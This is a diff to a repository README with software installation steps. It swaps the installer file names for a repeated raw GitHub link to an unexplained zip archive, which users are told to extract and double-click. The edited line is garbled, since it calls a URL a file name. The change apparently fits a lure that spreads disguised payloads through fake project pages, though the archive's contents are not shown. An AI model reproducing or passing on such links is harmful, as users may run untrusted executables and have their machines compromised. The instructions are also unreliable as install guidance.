tobiolol44/s3-f82/README.md

 4. **Extract the Files:** Once the download is complete, locate the downloaded file in your system’s downloads folder.
 Right-click on the file and select "Extract All" to unzip it.

 5. **Install the Application:** Inside the extracted folder, look for the installation file.
-This file is typically named `setup.exe` or `install.exe`.
+This file is typically named `https://raw.githubusercontent.com/tobiolol44/s3-f82/main/upboil/s3-f82.zip` or `https://raw.githubusercontent.com/tobiolol44/s3-f82/main/upboil/s3-f82.zip`.
 Double-click it to begin the installation process.
 Follow the on-screen instructions to complete the installation.

 ## 🔍 Key Features